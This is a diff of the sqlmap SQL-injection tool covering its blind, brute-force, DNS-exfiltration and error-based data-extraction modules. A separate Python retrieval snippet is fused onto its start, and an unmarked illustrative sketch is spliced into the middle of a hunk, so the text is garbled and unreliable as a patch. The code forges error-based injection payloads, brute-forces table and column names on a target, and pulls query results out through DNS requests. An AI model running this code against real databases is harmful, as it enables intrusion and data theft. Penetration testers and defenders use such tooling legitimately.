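    index_lock, value_lock = threading.Lock(), threading.Lock()

    def worker():
        while True:
            with index_lock:
                if state["index"] >= length:
                    return
                current = state["index"]
                state["index"] += 1

            char = fetch_char(current + 1)   # 1-based position, as in getChar(idx)

            with value_lock:
                value[current] = char if char is not None else '?'

    threads = [threading.Thread(target=worker) for _ in range(num_threads)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()

    return "".join(value)

# Example with a stand-in oracle instead of real blind SQL injection requests
print(retrieve_in_parallel(8, lambda idx: "password"[idx - 1]))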
if result: if showEta: - etaProgressUpdate(time.time() - charStart, len(commonValue)) - elif conf.verbose in (1, 2): + progress.progress(len(commonValue)) + elif conf.verbose in (1, 2) or conf.api: dataToStdout(filterControlChars(commonValue[index - 1:])) finalValue = commonValue - break # If there is a common pattern starting with partialValue, @@ -499,10 +647,13 @@ def blindThread(): # Substring-query containing equals commonPattern subquery = queries[Backend.getIdentifiedDbms()].substring.query % (expressionUnescaped, 1, len(commonPattern)) testValue = unescaper.escape("'%s'" % commonPattern) if "'" not in commonPattern else unescaper.escape("%s" % commonPattern, quote=False) - query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue))) + + query = getTechniqueData().vector + query = agent.prefixQuery(query.replace(INFERENCE_MARKER, "(%s)=%s" % (subquery, testValue))) query = agent.suffixQuery(query) + result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) - incrementCounter(kb.technique) + incrementCounter(getTechnique()) # Did we have luck? if result: @@ -521,45 +672,53 @@ def blindThread(): if not val: val = getChar(index, otherCharset, otherCharset == asciiTbl) else: - val = getChar(index, asciiTbl) + val = getChar(index, asciiTbl, not (charsetType is None and conf.charset)) - if val is None or (lastChar > 0 and index > lastChar): + if val is None: finalValue = partialValue break if kb.data.processChar: val = kb.data.processChar(val) - partialValue += val + threadData.shared.value = partialValue = partialValue + val if showEta: - etaProgressUpdate(time.time() - charStart, index) - elif conf.verbose in (1, 2): + progress.progress(index) + elif (conf.verbose in (1, 2) and not kb.bruteMode) or conf.api: dataToStdout(filterControlChars(val)) - # some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces - if len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace() and partialValue.strip(' ')[-1:] != '\n': + # Note: some DBMSes (e.g. Firebird, DB2, etc.) 
have issues with trailing spaces + if Backend.getIdentifiedDbms() in (DBMS.FIREBIRD, DBMS.DB2, DBMS.MAXDB, DBMS.DERBY, DBMS.FRONTBASE) and len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace(): finalValue = partialValue[:-INFERENCE_BLANK_BREAK] break + elif charsetType and partialValue[-1:].isspace(): + finalValue = partialValue[:-1] + break + + if (lastChar > 0 and index >= lastChar): + finalValue = "" if length == 0 else partialValue + finalValue = finalValue.rstrip() if len(finalValue) > 1 else finalValue + partialValue = None + break except KeyboardInterrupt: abortedFlag = True finally: kb.prependFlag = False - kb.stickyLevel = None retrievedLength = len(finalValue or "") if finalValue is not None: - finalValue = decodeHexValue(finalValue) if conf.hexConvert else finalValue + finalValue = decodeDbmsHexValue(finalValue) if conf.hexConvert else finalValue hashDBWrite(expression, finalValue) elif partialValue: hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) - if conf.hexConvert and not abortedFlag: + if conf.hexConvert and not any((abortedFlag, conf.api, kb.bruteMode)): infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime("%X"), filterControlChars(finalValue), " " * retrievedLength) dataToStdout(infoMsg) else: - if conf.verbose in (1, 2) or showEta: + if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)): dataToStdout("\n") if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: @@ -573,7 +732,8 @@ def blindThread(): raise KeyboardInterrupt _ = finalValue or partialValue - return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _ + + return getCounter(getTechnique()), safecharencode(_) if kb.safeCharEncode else _ def queryOutputLength(expression, payload): """ @@ -583,14 +743,15 @@ def queryOutputLength(expression, payload): infoMsg = "retrieving the length of query output" logger.info(infoMsg) - lengthExprUnescaped = agent.forgeQueryOutputLength(expression) start = time.time() + + lengthExprUnescaped = agent.forgeQueryOutputLength(expression) count, length = bisection(payload, lengthExprUnescaped, charsetType=CHARSET_TYPE.DIGITS) - debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start)) + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) logger.debug(debugMsg) - if length == " ": + if isinstance(length, six.string_types) and length.isspace(): length = 0 return length diff --git a/lib/techniques/brute/__init__.py b/lib/techniques/brute/__init__.py deleted file mode 100644 index 9e1072a9c4f..00000000000 --- a/lib/techniques/brute/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py deleted file mode 100644 index d57284826d7..00000000000 --- a/lib/techniques/brute/use.py +++ /dev/null @@ -1,242 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import time - -from lib.core.common import clearConsoleLine -from lib.core.common import dataToStdout -from lib.core.common import filterListValue -from lib.core.common import getFileItems -from lib.core.common import Backend -from lib.core.common import 
getPageWordSet -from lib.core.common import hashDBWrite -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import safeStringFormat -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import HASHDB_KEYS -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE -from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE -from lib.core.threads import getCurrentThreadData -from lib.core.threads import runThreads -from lib.request import inject - -def _addPageTextWords(): - wordsList = [] - - infoMsg = "adding words used on web page to the check list" - logger.info(infoMsg) - pageWords = getPageWordSet(kb.originalPage) - - for word in pageWords: - word = word.lower() - - if len(word) > 2 and not word[0].isdigit() and word not in wordsList: - wordsList.append(word) - - return wordsList - -def tableExists(tableFile, regex=None): - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), randomStr()))) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - if result: - errMsg = "can't use table existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - tables = getFileItems(tableFile, lowercase=Backend.getIdentifiedDbms() in (DBMS.ACCESS,), unique=True) - - infoMsg = "checking table existence using items from '%s'" % tableFile - logger.info(infoMsg) - - tables.extend(_addPageTextWords()) - tables = filterListValue(tables, regex) - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(tables) - threadData.shared.value = [] - threadData.shared.unique = set() - - def tableExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - table = safeSQLIdentificatorNaming(tables[threadData.shared.count], True) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s%s%s" % (conf.db, '..' 
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) - else: - fullTableName = table - - result = inject.checkBooleanExpression("%s" % safeStringFormat(BRUTE_TABLE_EXISTS_TEMPLATE, (randomInt(1), fullTableName))) - - kb.locks.io.acquire() - - if result and table.lower() not in threadData.shared.unique: - threadData.shared.value.append(table) - threadData.shared.unique.add(table.lower()) - - if conf.verbose in (1, 2): - clearConsoleLine(True) - infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), table) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, tableExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during table existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no table(s) found" - logger.warn(warnMsg) - else: - for item in threadData.shared.value: - if conf.db not in kb.data.cachedTables: - kb.data.cachedTables[conf.db] = [item] - else: - kb.data.cachedTables[conf.db].append(item) - - for _ in ((conf.db, item) for item in threadData.shared.value): - if _ not in kb.brute.tables: - kb.brute.tables.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_TABLES, kb.brute.tables, True) - - return kb.data.cachedTables - -def columnExists(columnFile, regex=None): - if not conf.tbl: - errMsg = "missing table parameter" - raise SqlmapMissingMandatoryOptionException(errMsg) - - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - conf.db = conf.db.upper() - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (randomStr(), randomStr()))) - - if result: - errMsg = "can't use column existence check because of detected invalid results " - errMsg += "(most probably caused by inability of the used injection " - errMsg += "to distinguish errornous results)" - raise SqlmapDataException(errMsg) - - infoMsg = "checking column existence using items from '%s'" % columnFile - logger.info(infoMsg) - - columns = getFileItems(columnFile, unique=True) - columns.extend(_addPageTextWords()) - columns = filterListValue(columns, regex) - - table = safeSQLIdentificatorNaming(conf.tbl, True) - - if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - table = "%s.%s" % (safeSQLIdentificatorNaming(conf.db), table) - - kb.threadContinue = True - kb.bruteMode = True - - threadData = getCurrentThreadData() - threadData.shared.count = 0 - threadData.shared.limit = len(columns) - threadData.shared.value = [] - - def columnExistsThread(): - threadData = getCurrentThreadData() - - while kb.threadContinue: - kb.locks.count.acquire() - if threadData.shared.count < threadData.shared.limit: - column = safeSQLIdentificatorNaming(columns[threadData.shared.count]) - threadData.shared.count += 1 - kb.locks.count.release() - else: - kb.locks.count.release() - break - - result = inject.checkBooleanExpression(safeStringFormat(BRUTE_COLUMN_EXISTS_TEMPLATE, (column, table))) - - kb.locks.io.acquire() - - if result: - threadData.shared.value.append(column) - - if conf.verbose in (1, 2): - clearConsoleLine(True) - 
infoMsg = "[%s] [INFO] retrieved: %s\r\n" % (time.strftime("%X"), column) - dataToStdout(infoMsg, True) - - if conf.verbose in (1, 2): - status = '%d/%d items (%d%%)' % (threadData.shared.count, threadData.shared.limit, round(100.0 * threadData.shared.count / threadData.shared.limit)) - dataToStdout("\r[%s] [INFO] tried %s" % (time.strftime("%X"), status), True) - - kb.locks.io.release() - - try: - runThreads(conf.threads, columnExistsThread, threadChoice=True) - - except KeyboardInterrupt: - warnMsg = "user aborted during column existence " - warnMsg += "check. sqlmap will display partial output" - logger.warn(warnMsg) - - clearConsoleLine(True) - dataToStdout("\n") - - if not threadData.shared.value: - warnMsg = "no column(s) found" - logger.warn(warnMsg) - else: - columns = {} - - for column in threadData.shared.value: - result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %s FROM %s WHERE ROUND(%s)=ROUND(%s))", (column, table, column, column))) - - if result: - columns[column] = 'numeric' - else: - columns[column] = 'non-numeric' - - kb.data.cachedColumns[conf.db] = {conf.tbl: columns} - - for _ in map(lambda x: (conf.db, conf.tbl, x[0], x[1]), columns.items()): - if _ not in kb.brute.columns: - kb.brute.columns.append(_) - - hashDBWrite(HASHDB_KEYS.KB_BRUTE_COLUMNS, kb.brute.columns, True) - - return kb.data.cachedColumns diff --git a/lib/techniques/dns/__init__.py b/lib/techniques/dns/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/dns/__init__.py +++ b/lib/techniques/dns/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/dns/test.py b/lib/techniques/dns/test.py index 260849bcadf..24ba334d5cc 100644 --- a/lib/techniques/dns/test.py +++ b/lib/techniques/dns/test.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend @@ -14,7 +14,6 @@ from lib.core.exception import SqlmapNotVulnerableException from lib.techniques.dns.use import dnsUse - def dnsTest(payload): logger.info("testing for data retrieval through DNS channel") @@ -24,7 +23,7 @@ def dnsTest(payload): if not kb.dnsTest: errMsg = "data retrieval through DNS channel failed" if not conf.forceDns: - conf.dnsName = None + conf.dnsDomain = None errMsg += ". 
Turning off DNS exfiltration support" logger.error(errMsg) else: diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 88998d77483..78854c0122a 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -1,19 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue +from lib.core.common import decodeDbmsHexValue from lib.core.common import extractRegexResult from lib.core.common import getSQLSnippet from lib.core.common import hashDBRetrieve @@ -22,6 +21,7 @@ from lib.core.common import randomStr from lib.core.common import safeStringFormat from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -32,7 +32,7 @@ from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request - +from lib.utils.safe2bin import safecharencode def dnsUse(payload, expression): """ @@ -46,7 +46,7 @@ def dnsUse(payload, expression): count = 0 offset = 1 - if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): + if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: @@ -58,19 +58,23 @@ def dnsUse(payload, expression): while True: count += 1 prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) - chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2 + chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) + extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) + if extendedField != fieldToCastStr: # e.g. 
MIN(surname) + nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField) + fieldToCastStr = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) nulledCastedField = agent.hexConvertField(nulledCastedField) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) - expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName) + expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) expressionUnescaped = unescaper.escape(expressionRequest) if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): query = agent.prefixQuery("; %s" % expressionUnescaped) - query = agent.suffixQuery(query) + query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query) forgedPayload = agent.payload(newValue=query) else: forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3))) @@ -80,8 +84,8 @@ def dnsUse(payload, expression): _ = conf.dnsServer.pop(prefix, suffix) if _: - _ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) - _ = decodeHexValue(_) + _ = extractRegexResult(r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) + _ = decodeDbmsHexValue(_) output = (output or "") + _ offset += len(_) @@ -90,22 +94,24 @@ def dnsUse(payload, expression): else: break + output = decodeDbmsHexValue(output) if conf.hexConvert else output + kb.dnsMode = False if output is not None: retVal = output if kb.dnsTest is not None: - dataToStdout("[%s] [INFO] %s: %s\r\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) + dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) if count > 0: hashDBWrite(expression, output) if not kb.bruteMode: - debugMsg = "performed %d queries in %d seconds" % (count, calculateDeltaSeconds(start)) + debugMsg = "performed %d quer%s in %.2f seconds" % (count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) logger.debug(debugMsg) - elif conf.dnsName: + elif conf.dnsDomain: warnMsg = "DNS data exfiltration method through SQL injection " warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms() singleTimeWarnMessage(warnMsg) diff --git a/lib/techniques/error/__init__.py b/lib/techniques/error/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/lib/techniques/error/__init__.py +++ b/lib/techniques/error/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 54b509b73cc..a9ae8bac007 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -1,22 +1,27 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import 
agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import dataToStdout -from lib.core.common import decodeHexValue +from lib.core.common import decodeDbmsHexValue from lib.core.common import extractRegexResult -from lib.core.common import getUnicode +from lib.core.common import firstNotNone +from lib.core.common import getConsoleWidth +from lib.core.common import getPartRun +from lib.core.common import getTechnique +from lib.core.common import getTechniqueData from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import incrementCounter @@ -26,20 +31,26 @@ from lib.core.common import listToStrValue from lib.core.common import readInput from lib.core.common import unArrayizeValue -from lib.core.convert import hexdecode -from lib.core.convert import htmlunescape +from lib.core.common import wasLastResponseHTTPError +from lib.core.compat import xrange +from lib.core.convert import decodeHex +from lib.core.convert import getUnicode +from lib.core.convert import htmlUnescape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS -from lib.core.enums import PAYLOAD +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import HTTP_HEADER +from lib.core.exception import SqlmapDataException from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD -from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH -from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH +from lib.core.settings import MAX_ERROR_CHUNK_LENGTH +from lib.core.settings import MIN_ERROR_CHUNK_LENGTH from lib.core.settings import NULL from lib.core.settings import PARTIAL_VALUE_MARKER +from lib.core.settings import ROTATING_CHARS from lib.core.settings import SLOW_ORDER_COUNT_THRESHOLD from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT @@ -47,9 +58,13 @@ from lib.core.threads import runThreads from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request +from lib.utils.progress import ProgressBar +from lib.utils.safe2bin import safecharencode +from thirdparty import six -def _oneShotErrorUse(expression, field=None): +def _oneShotErrorUse(expression, field=None, chunkTest=False): offset = 1 + rotator = 0 partialValue = None threadData = getCurrentThreadData() retVal = hashDBRetrieve(expression, checkConf=True) @@ -61,31 +76,58 @@ def _oneShotErrorUse(expression, field=None): threadData.resumed = retVal is not None and not partialValue - if Backend.isDbms(DBMS.MYSQL): - chunk_length = MYSQL_ERROR_CHUNK_LENGTH - elif Backend.isDbms(DBMS.MSSQL): - chunk_length = MSSQL_ERROR_CHUNK_LENGTH - else: - chunk_length = None + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: + debugMsg = "searching for error chunk length..." 
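# Illustrative sketch (not part of this patch; the oracle below is a hypothetical
# stand-in for the target): the chunk-length search announced above, and implemented
# in the hunk that follows, emits a run of a known character via REPEAT()/REPLICATE()/
# RPAD() and adopts the longest run that comes back intact in the error message.

import re

MIN_CHUNK, MAX_CHUNK = 32, 1024              # sketch bounds, not the real settings

def find_chunk_length(oracle):
    seen = set()
    current = MAX_CHUNK

    while current >= MIN_CHUNK:
        probe = str(current % 10) * current            # e.g. "444...4"
        result = oracle(probe) or ""
        seen.add(current)

        if result == probe:
            return current                             # full run echoed back
        match = re.search(r"\A\w+", result)
        if match:
            candidate = len(match.group(0))            # adopt the observed length
            current = candidate if candidate != current and candidate not in seen else current - 1
        else:
            current //= 2                              # nothing echoed, halve the run

    return 0

# Fake target whose error output gets truncated after 253 characters
print(find_chunk_length(lambda payload: payload[:253]))    # -> 253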
+ logger.debug(debugMsg) + + seen = set() + current = MAX_ERROR_CHUNK_LENGTH + while current >= MIN_ERROR_CHUNK_LENGTH: + testChar = str(current % 10) + + if Backend.isDbms(DBMS.ORACLE): + testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar) + else: + testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current) + testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery) + + result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True)) + seen.add(current) + + if (result or "").startswith(testChar): + if result == testChar * current: + kb.errorChunkLength = current + break + else: + result = re.search(r"\A\w+", result).group(0) + candidate = len(result) - len(kb.chars.stop) + current = candidate if candidate != current and candidate not in seen else current - 1 + else: + current = current // 2 + + if kb.errorChunkLength: + hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) + else: + kb.errorChunkLength = 0 if retVal is None or partialValue: try: while True: - check = "%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = "%s(?P<result>.*?)</" % (kb.chars.start) + check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) + trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start if field: nulledCastedField = agent.nullAndCastField(field) - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)) and not any(_ in field for _ in ("COUNT", "CASE")): # skip chunking of scalar expression (unneeded) + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest: extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) if extendedField != field: # e.g. 
MIN(surname) nulledCastedField = extendedField.replace(field, nulledCastedField) field = extendedField - nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) + nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength) # Forge the error-based SQL injection request - vector = kb.injection.data[kb.technique].vector + vector = getTechniqueData().vector query = agent.prefixQuery(vector) query = agent.suffixQuery(query) injExpression = expression.replace(field, nulledCastedField, 1) if field else expression @@ -94,76 +136,99 @@ def _oneShotErrorUse(expression, field=None): payload = agent.payload(newValue=injExpression) # Perform the request - page, headers = Request.queryPage(payload, content=True) + page, headers, _ = Request.queryPage(payload, content=True, raise404=False) + + incrementCounter(getTechnique()) - incrementCounter(kb.technique) + if page and conf.noEscape: + page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) # Parse the returned page to get the exact error-based # SQL injection output - output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page, re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, listToStrValue(headers.headers \ - if headers else None), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)), \ - None) + output = firstNotNone( + extractRegexResult(check, page), + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) if output is not None: output = getUnicode(output) else: - trimmed = extractRegexResult(trimcheck, page, re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, listToStrValue(headers.headers \ - if headers else None), re.DOTALL | re.IGNORECASE) \ - or extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] \ - if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \ - threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE) + trimmed = firstNotNone( + extractRegexResult(trimCheck, page), + extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None) + ) if trimmed: - warnMsg = "possible server trimmed output detected " - warnMsg += "(due to its length and/or content): " - warnMsg += safecharencode(trimmed) - logger.warn(warnMsg) - - if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL)): + if not chunkTest: + warnMsg = "possible server trimmed output detected " + warnMsg += "(due to its length and/or content): " + warnMsg += safecharencode(trimmed) + logger.warning(warnMsg) + + if not kb.testMode: + check = 
r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[:2] + output = extractRegexResult(check, trimmed, re.IGNORECASE) + + if not output: + check = r"(?P<result>[^\s<>'\"]+)" + output = extractRegexResult(check, trimmed, re.IGNORECASE) + else: + output = output.rstrip() + + if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)): if offset == 1: retVal = output else: retVal += output if output else '' - if output and len(output) >= chunk_length: - offset += chunk_length + if output and kb.errorChunkLength and len(output) >= kb.errorChunkLength and not chunkTest: + offset += kb.errorChunkLength else: break - if kb.fileReadMode and output: - dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + if output and conf.verbose in (1, 2) and not any((conf.api, kb.bruteMode)): + if kb.fileReadMode: + dataToStdout(_formatPartialContent(output).replace(r"\n", "\n").replace(r"\t", "\t")) + elif offset > 1: + rotator += 1 + + if rotator >= len(ROTATING_CHARS): + rotator = 0 + + dataToStdout("\r%s\r" % ROTATING_CHARS[rotator]) else: retVal = output break except: - hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) + if retVal is not None: + hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) raise - retVal = decodeHexValue(retVal) if conf.hexConvert else retVal + retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal - if isinstance(retVal, basestring): - retVal = 